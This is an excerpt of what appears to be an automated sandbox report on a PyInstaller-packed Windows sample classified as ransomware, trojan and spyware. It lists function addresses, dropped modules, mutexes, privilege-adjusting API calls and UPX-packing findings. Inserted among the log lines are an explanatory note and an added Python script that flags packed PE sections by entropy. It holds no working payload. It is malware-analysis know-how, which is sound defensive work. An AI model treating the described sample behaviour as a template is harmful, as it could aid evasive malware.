              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB38B3701_2_00007FFDFB38B370
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3E7B901_2_00007FFDFB3E7B90
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3CFC001_2_00007FFDFB3CFC00
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB38F8B51_2_00007FFDFB38F8B5
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3814511_2_00007FFDFB381451
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB381DCF1_2_00007FFDFB381DCF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3819561_2_00007FFDFB381956
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9AEE30276_2_00007FFD9AEE3027
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B27B2465_2_00007FF629B27B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B00A2C65_2_00007FF629B00A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFABA065_2_00007FF629AFABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1AE1065_2_00007FF629B1AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF82F065_2_00007FF629AF82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0118065_2_00007FF629B01180
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B054C065_2_00007FF629B054C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFB54065_2_00007FF629AFB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF188465_2_00007FF629AF1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B5AAC065_2_00007FF629B5AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFCB1465_2_00007FF629AFCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2FA6C65_2_00007FF629B2FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B35A7065_2_00007FF629B35A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B369FD65_2_00007FF629B369FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF49B865_2_00007FF629AF49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1D97C65_2_00007FF629B1D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B46D0C65_2_00007FF629B46D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B19D0C65_2_00007FF629B19D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B20D2065_2_00007FF629B20D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFDD0465_2_00007FF629AFDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B35C8C65_2_00007FF629B35C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B08C3065_2_00007FF629B08C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B49B9865_2_00007FF629B49B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B34B3865_2_00007FF629B34B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2AF0C65_2_00007FF629B2AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF9EFC65_2_00007FF629AF9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3EEA465_2_00007FF629B3EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3AE5065_2_00007FF629B3AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFCE8465_2_00007FF629AFCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B08E6865_2_00007FF629B08E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4FE7465_2_00007FF629B4FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B41DCC65_2_00007FF629B41DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFEE0865_2_00007FF629AFEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B01E0465_2_00007FF629B01E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B39D7465_2_00007FF629B39D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1010465_2_00007FF629B10104
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B500F065_2_00007FF629B500F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2804065_2_00007FF629B28040
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1C05C65_2_00007FF629B1C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2007465_2_00007FF629B20074
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2C00C65_2_00007FF629B2C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0303065_2_00007FF629B03030
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B5DFD865_2_00007FF629B5DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B34FE865_2_00007FF629B34FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B5AF9065_2_00007FF629B5AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B25F4C65_2_00007FF629B25F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF42E065_2_00007FF629AF42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4131465_2_00007FF629B41314
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4832C65_2_00007FF629B4832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0D2C065_2_00007FF629B0D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFF24C65_2_00007FF629AFF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B302A465_2_00007FF629B302A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1724465_2_00007FF629B17244
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4226865_2_00007FF629B42268
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0E21C65_2_00007FF629B0E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B541CC65_2_00007FF629B541CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B381CC65_2_00007FF629B381CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3216465_2_00007FF629B32164
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFA50465_2_00007FF629AFA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1D45865_2_00007FF629B1D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3546865_2_00007FF629B35468
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1C3E065_2_00007FF629B1C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0236065_2_00007FF629B02360
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2037465_2_00007FF629B20374
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3270065_2_00007FF629B32700
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2A71065_2_00007FF629B2A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3071065_2_00007FF629B30710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B086C465_2_00007FF629B086C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B586D465_2_00007FF629B586D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4766065_2_00007FF629B47660
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B265FC65_2_00007FF629B265FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4260C65_2_00007FF629B4260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0859865_2_00007FF629B08598
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2F59C65_2_00007FF629B2F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1F5B065_2_00007FF629B1F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2090465_2_00007FF629B20904
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3190C65_2_00007FF629B3190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2D91C65_2_00007FF629B2D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B238E865_2_00007FF629B238E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B418A865_2_00007FF629B418A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0289065_2_00007FF629B02890
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF888465_2_00007FF629AF8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B017C865_2_00007FF629B017C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B167E065_2_00007FF629B167E0
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB3ED74F appears 44 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB002734 appears 511 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB0024B9 appears 83 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB001EF1 appears 1581 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB00483B appears 128 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB3812EE appears 131 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB004057 appears 782 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB002A04 appears 172 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB00698D appears 49 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FF6FB1E25F0 appears 100 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FF6FB1E2760 appears 36 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB004D68 appears 38 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB00688E appears 31 times
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: String function: 00007FFDFB00300D appears 55 times
Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: String function: 00007FF629B349F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: String function: 00007FF629B08444 appears 48 times
Source: e45AiBoV6X.exe | Static PE information: invalid certificate
Source: rar.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: e45AiBoV6X.exe | Binary or memory string: OriginalFilename vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameTpmInit.EXEj% vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1716520142.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe | Binary or memory string: OriginalFilename vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1995577152.00007FFE1026B000.00000004.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1998105066.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1996719038.00007FFE11EBD000.00000004.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000000.1721262805.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameTpmInit.EXEj% vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1997261664.00007FFE126D7000.00000004.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1994792441.00007FFE0EC6D000.00000004.00000001.01000000.0000000E.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1997027781.00007FFE11EE3000.00000004.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1994297554.00007FFDFF2FE000.00000004.00000001.01000000.0000000B.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1995081068.00007FFE101E4000.00000004.00000001.01000000.00000011.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1993521575.00007FFDFB897000.00000004.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython310.dll. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmp | Binary or memory string: OriginalFilenamelibsslH vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1997553362.00007FFE126F7000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1996384225.00007FFE10318000.00000004.00000001.01000000.0000000C.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe, 00000001.00000002.1997841241.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs e45AiBoV6X.exe
Source: e45AiBoV6X.exe | Binary or memory string: OriginalFilenameTpmInit.EXEj% vs e45AiBoV6X.exe
Note: the sample's own version resource names it TpmInit.EXE, the name of a Windows TPM initialisation utility, which does not match the file actually submitted; the remaining OriginalFilename strings (python310.dll, the *.pyd extension modules, libssl/libcrypto, sqlite3.dll, vcruntime140.dll) belong to the PyInstaller payload that is unpacked into the _MEI73802 temp directory at runtime, not to the dropper itself.
Source: libcrypto-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.998771639088251
Source: libssl-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
Source: python310.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.99934387748315
Source: sqlite3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9978469358079526
Source: unicodedata.pyd.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9943230597527473
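The five findings above flag the dropped runtime DLLs as UPX-packed: a UPX1 section whose contents barely compress further. The following is an added example, not code from the report or from Joe Sandbox, that reproduces this kind of check with the Python standard library only. It walks the PE section table, computes per-section Shannon entropy and a zlib compressed-to-raw size ratio (my assumption is that this ratio is what the report calls "ZLIB complexity"; a value near 1.0 means the bytes are already compressed or encrypted), and flags sections by known packer names. The 0.98 threshold and the packer-name list are my choices; the sample PE is constructed in memory with no optional header, so it is parseable but not loadable.

```python
import math
import random
import struct
import zlib

# Section names that common packers leave behind (assumption: a short, illustrative list).
PACKER_SECTION_PREFIXES = ("UPX", ".VMP", ".ASPACK", "MPRESS", ".PETITE")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 is the maximum for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """zlib-compressed size over raw size, clamped to 1.0 (random data does not shrink)."""
    if not data:
        return 0.0
    return min(1.0, len(zlib.compress(data, 9)) / len(data))


def parse_sections(pe: bytes):
    """Yield (name, raw_bytes) for every section header in a PE image (read from file bytes)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    size_of_optional = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_of_optional  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess_sections(pe: bytes, complexity_threshold: float = 0.98):
    """Per-section packing indicators, in section-table order."""
    findings = []
    for name, data in parse_sections(pe):
        cx = zlib_complexity(data)
        findings.append({
            "name": name,
            "size": len(data),
            "entropy": round(shannon_entropy(data), 3),
            "zlib_complexity": round(cx, 4),
            "packer_name": name.upper().startswith(PACKER_SECTION_PREFIXES),
            "incompressible": cx >= complexity_threshold,
        })
    return findings


def suspicious_sections(pe: bytes):
    """Names of sections that look packed by either heuristic."""
    return [f["name"] for f in assess_sections(pe) if f["incompressible"] or f["packer_name"]]


def build_sample_pe() -> bytes:
    """Constructed minimal x64 PE with a compressible .text and an incompressible UPX1 section."""
    rng = random.Random(1477272)  # fixed seed so the sample is reproducible
    text = b"\x90" * 4096  # NOP sled stands in for ordinary, compressible code
    upx1 = bytes(rng.getrandbits(8) for _ in range(4096))  # stands in for packed data
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # IMAGE_FILE_HEADER: machine, sections, timestamp, symtab ptr, symbol count, optional size, flags
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0, 0x0022)

    def hdr(name, vaddr, raw_ptr, size):
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, raw_ptr, 0, 0, 0, 0, 0x60000020)

    headers = hdr(b".text", 0x1000, 0x200, len(text)) + hdr(b"UPX1", 0x2000, 0x1200, len(upx1))
    image = dos + coff + headers
    image += b"\0" * (0x200 - len(image))  # pad headers to the first raw-data offset
    return image + text + upx1


if __name__ == "__main__":
    for finding in assess_sections(build_sample_pe()):
        print(finding)
```

To run it against a real dropped file, replace `build_sample_pe()` with the bytes read from disk; a whole-file entropy figure is less useful than the per-section view, because a packed DLL still has a low-entropy header and an almost empty UPX0 section next to the dense UPX1 one.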
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@135/52@2/2
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: 0_2_00007FF6FB1E29E0 GetLastError,FormatMessageW,MessageBoxW
Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: 65_2_00007FF629B0EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: 65_2_00007FF629B3B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe | Code function: 65_2_00007FF629B13144 GetDiskFreeSpaceExW
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeMutant created: \Sessions\1\BaseNamedObjects\3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802Jump to behavior
